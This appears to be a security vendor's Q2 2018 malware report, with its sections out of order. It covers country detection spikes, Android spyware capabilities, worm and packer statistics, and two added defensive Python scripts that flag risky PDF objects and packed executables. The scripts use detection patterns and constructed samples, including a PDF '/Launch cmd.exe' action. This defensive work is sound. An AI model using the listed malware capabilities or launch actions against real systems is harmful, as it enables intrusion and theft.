This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With five offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of dissemination for the malware was social networks.

Version 1: Dardesh, Google Play Services, Instant Apps
Version 2: Settings
Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools such as FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.
4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has four different versions.

Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:
- Enable and disable the GPS service
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about installed applications
- Collect browser data
- Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications such as VPN Easy and DroFirewall. In addition to the abilities of the previous versions, it includes some additional tricks:
- Extracts photos, audio and video
- Records the screen
- Executes shell commands
- Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend
Disguises of MikeSpy

MikeSpy camouflages itself as a "Virtual Girlfriend" application, but instead of a girlfriend it delivers a bundle of malicious abilities:
- Takes control of the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message database and the related keys
- Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.

Versions 1 to 3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Keep Wi-Fi always turned on

Version 2 can execute additional commands:
- Send SMS and read outgoing SMS
- Enable and disable the Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As the table shows, it is the champion in the number of masks it puts on to deceive users.

App: Distribution (disguise names)
FlexiSpy: MBackup
HelloSpy: ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب, اسپای ھاید, Keylogger, System Service
Mobile Spy: 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
Disguises of Stalker Spy

In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

佐川急便, 현대캐피탈
Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:
- contacts: get contact details and email ID
- Mute: set action to mute
- Mms: get MMS content
- info: get device information
4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android

The second version can block access to some Google services and apps, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Disguises of Hero Rat

Its code is available on a Telegram hacking channel; notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option; if the user taps it, the malware begins working in the background, subscribing the user to services they never ordered. It comes to victims in the variety of disguises listed above.

4.1.11 CoinHive

The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which extends its mining capability. It is disseminated via the counterfeit apps listed below, but one of its vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for the purpose, downloads it and implants it on the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is herself a victim: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

[Chart: Android-targeted malware in April 2018; vertical axis ticks 0 to 180,000]

4.2.2 May 2018

[Chart: Android-targeted malware in May 2018; vertical axis ticks 0 to 500,000]

4.2.3 June 2018

[Chart: Android-targeted malware in June 2018; vertical axis ticks 0 to 300,000]
5 Malware in Q2 2018: The Big Picture

This section opens with a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms

Email worms spread by mailing copies of themselves to addresses harvested from an infected computer; they are nasty in that many also travel between victim computers by other means, for example via exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 P2P Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.

Polip was the most common p2p worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may use the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p worm outbreak, but many.
5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant-messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM worm was a variant of a famous IM worm called Yahos, which in 2012 led the FBI to arrest ten people for spreading banking malware via social networks with the Yahos IM worm.

This timeline shows that while Comodo did not detect many IM worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.
5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was DarkComet (also written Dark Komet), a remote access trojan (RAT) that is now fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices, corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as opening an attachment or clicking on a hyperlink.

Ramnit was the top virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (.exe) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant virus spikes, in mid-April and mid-May.
5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign computer programs. Typically, trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the number one country for trojans according to Comodo detections.

And this timeline shows when this huge trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections are comparatively rare, because the vulnerabilities they target are typically patched soon after they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were aimed at a favorite hacker target: Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
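Because the report singles out PDF files as the main exploit carrier this quarter, here is an added example (not Comodo's detection logic, and not code from the report) of the static triage a responder can run on a suspect PDF before anyone opens it: count the name objects that exploit documents rely on (/JavaScript, /OpenAction, /Launch and so on), resolve the #xx hex escapes that PDF permits inside names so that an obfuscated /J#61vaScript is not missed, and inflate FlateDecode streams so that keys tucked into compressed object streams are scanned as well. The three sample PDFs are constructed inline for the demonstration; they are PDF-shaped byte strings, not real malicious documents, and the severity thresholds in verdict() are an assumption for illustration.

```python
"""Static triage of a suspect PDF for exploit-delivery indicators.

Added example, not Comodo's detector. Works on the raw bytes only, so it is
safe to run on untrusted files: nothing is rendered or executed.
"""
import re
import zlib
from typing import Dict

# Name objects that appear in most malicious PDFs: script execution, auto-run
# triggers, external launches, embedded payloads and active form content.
RISKY = ("JavaScript", "JS", "OpenAction", "AA", "Launch",
         "EmbeddedFile", "RichMedia", "XFA", "URI")

# A PDF name is "/" followed by regular characters; "#xx" escapes any byte.
NAME_RE = re.compile(rb"/([A-Za-z0-9#]+)")
# "stream ... endstream" bodies; the lookbehind stops "endstream" itself from
# being taken as the start of a new stream.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.S)


def decode_name(raw: bytes) -> str:
    """Resolve #xx escapes: b'J#61vaScript' -> 'JavaScript'."""
    unescaped = re.sub(rb"#([0-9A-Fa-f]{2})",
                       lambda m: bytes([int(m.group(1), 16)]), raw)
    return unescaped.decode("latin-1")


def inflate_streams(pdf: bytes) -> bytes:
    """Concatenate the contents of every zlib-inflatable stream in the file.

    decompressobj tolerates the newline that precedes 'endstream'; streams
    that are not Flate-encoded raise zlib.error and are skipped.
    """
    inflated = []
    for m in STREAM_RE.finditer(pdf):
        try:
            inflated.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue
    return b"\n".join(inflated)


def triage(pdf: bytes) -> Dict[str, int]:
    """Count risky names in the raw file body and in its inflated streams."""
    counts = {name: 0 for name in RISKY}
    scope = pdf + b"\n" + inflate_streams(pdf)
    for m in NAME_RE.finditer(scope):
        name = decode_name(m.group(1))
        if name in counts:
            counts[name] += 1
    return counts


def verdict(counts: Dict[str, int]) -> str:
    """Rough severity (assumed thresholds): active content wired to an auto-run
    trigger is the classic exploit-document pattern."""
    auto_run = counts["OpenAction"] + counts["AA"]
    active = (counts["JavaScript"] + counts["JS"] + counts["Launch"]
              + counts["RichMedia"] + counts["XFA"])
    if active and auto_run:
        return "high"
    if active or counts["EmbeddedFile"] or counts["URI"]:
        return "medium"
    return "low"


def _pdf(body: bytes) -> bytes:
    """Wrap one object in a minimal PDF skeleton (constructed input, not a renderable file)."""
    return b"%PDF-1.7\n" + body + b"\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"


# Constructed samples: a benign catalog, an obfuscated auto-run script, and a
# /Launch action hidden inside a Flate-compressed object stream.
SAMPLE_CLEAN = _pdf(b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n")
SAMPLE_OBFUSCATED = _pdf(
    b"1 0 obj\n<< /Type /Catalog /OpenAction << /S /J#61vaScript "
    b"/JS (this.exportDataObject({cName: 'x', nLaunch: 2})) >> >>\nendobj\n")
_compressed = zlib.compress(b"<< /S /Launch /F (cmd.exe) >>")
SAMPLE_COMPRESSED = _pdf(
    b"1 0 obj\n<< /Type /ObjStm /Filter /FlateDecode /Length "
    + str(len(_compressed)).encode() + b" >>\nstream\n"
    + _compressed + b"\nendstream\nendobj\n")

if __name__ == "__main__":
    for label, sample in (("clean", SAMPLE_CLEAN), ("obfuscated", SAMPLE_OBFUSCATED),
                          ("compressed", SAMPLE_COMPRESSED)):
        found = triage(sample)
        print(label, verdict(found), {k: v for k, v in found.items() if v})
```

The two evasions handled here, hex-escaped names and compressed object streams, are exactly what defeats a plain `grep /JavaScript`; a name-count triage of this kind is a first filter, not a verdict, so anything scored medium or high still belongs in a sandbox or a full parser.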
5.3 Medium Threat Malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructors

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the number one constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for constructors.

And this timeline shows that Germany not only had a serious problem with constructors in Q2 but also that this malware is likely a persistent threat to German networks.
5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing, or "packing", it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed form and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, the detection name for executables packed with a modified "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous executable formats and operating systems and uses the open-source UCL compression library, whose decompressor is only a few hundred bytes of code. Modifying the packer (for example by renaming its sections or removing its marker strings) is a cheap way to defeat automatic unpacking and signatures tuned to stock UPX.

In Q2 2018 Russia was the number one home of malware packers.

This timeline shows that Russia had the most persistent packer problems, while Iran had the highest periodic spikes.
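The heuristics below are an added example (not Comodo's detection logic, and not code from the report) of what still catches a modified UPX build once its UPX0/UPX1 section names and "UPX!" tag have been stripped: a section with a large virtual size but no raw data (the region the stub unpacks into), plus a high-entropy section holding the compressed payload. The script parses the PE headers directly with the standard library; the three sample images (stock UPX, modified UPX and an unpacked executable) are constructed in memory for the demonstration, so they are PE-shaped byte strings rather than real binaries, and the 0x1000-byte and 7.0-bit thresholds are assumed values to be tuned against a real corpus.

```python
"""Heuristic packer triage for Windows PE files.

Added example, not Comodo's detection logic. Standard library only. Applies
three classic indicators:
  1. stock UPX markers (UPX0/UPX1/UPX2 section names or a "UPX!" tag),
  2. a section with a large virtual size but no raw data (the unpack target),
  3. a high-entropy section (the compressed or encrypted payload).
A modified UPX ("MUPX") usually strips indicator 1; indicators 2 and 3 survive.
"""
import math
import struct
from collections import Counter
from typing import Dict, List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> List[Dict]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size          # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40              # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, _vaddr, rsize, rptr = struct.unpack_from("<8sIIII", pe, off)
        raw = pe[rptr:rptr + rsize] if rsize else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "vsize": vsize,
            "rsize": rsize,
            "entropy": shannon_entropy(raw),
        })
    return sections


def packer_indicators(pe: bytes) -> List[str]:
    """Return the triggered indicators; an empty list means nothing packer-like."""
    hits = []
    sections = parse_sections(pe)
    names = {s["name"] for s in sections}
    if names & {"UPX0", "UPX1", "UPX2"} or b"UPX!" in pe:
        hits.append("upx-marker")
    for s in sections:
        label = s["name"] or "?"
        if s["rsize"] == 0 and s["vsize"] >= 0x1000:      # assumed threshold
            hits.append(f"empty-raw-large-virtual:{label}")
        if s["rsize"] >= 256 and s["entropy"] > 7.0:      # assumed threshold
            hits.append(f"high-entropy:{label}")
    return hits


def build_pe(sections: List[Tuple[str, int, bytes]]) -> bytes:
    """Build a minimal PE-shaped image (constructed test input, not a runnable binary).

    sections: (name, virtual_size, raw_bytes); empty raw_bytes gives SizeOfRawData 0.
    """
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader (0: the parser only needs the section table), Characteristics.
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table_off = e_lfanew + 4 + len(coff)
    data_off = table_off + 40 * len(sections)
    table, blobs = bytearray(), bytearray()
    for name, vsize, raw in sections:
        rptr = data_off + len(blobs) if raw else 0
        table += struct.pack("<8sIIII", name.encode().ljust(8, b"\0"), vsize, 0x1000, len(raw), rptr)
        table += struct.pack("<IIHHI", 0, 0, 0, 0, 0xE0000040)   # relocs, linenums, Characteristics
        blobs += raw
    return bytes(dos) + b"PE\0\0" + coff + bytes(table) + bytes(blobs)


# Constructed samples. bytes(range(256)) * 4 has maximal (8.0-bit) entropy and
# stands in for a compressed payload.
PAYLOAD = bytes(range(256)) * 4
STOCK_UPX = build_pe([("UPX0", 0x20000, b""), ("UPX1", 0x8000, PAYLOAD)])
MODIFIED_UPX = build_pe([(".code", 0x20000, b""), (".seg1", 0x8000, PAYLOAD)])
UNPACKED = build_pe([(".text", 0x400, b"\x90" * 512 + b"\xc3"), (".data", 0x100, b"A" * 256)])

if __name__ == "__main__":
    for label, image in (("stock UPX", STOCK_UPX), ("modified UPX", MODIFIED_UPX), ("unpacked", UNPACKED)):
        print(f"{label:13s} -> {packer_indicators(image) or ['clean']}")
```

Run against the modified image, the UPX marker check is silent but the structural and entropy checks still fire, which is why detection names like MUPX exist at all: the stub has to leave room to unpack into and has to carry a compressed blob, and neither can be renamed away. The entropy threshold needs tuning on real samples, since legitimately compressed resources and signed installers also score high.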
5.3.3 Email Flooders

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

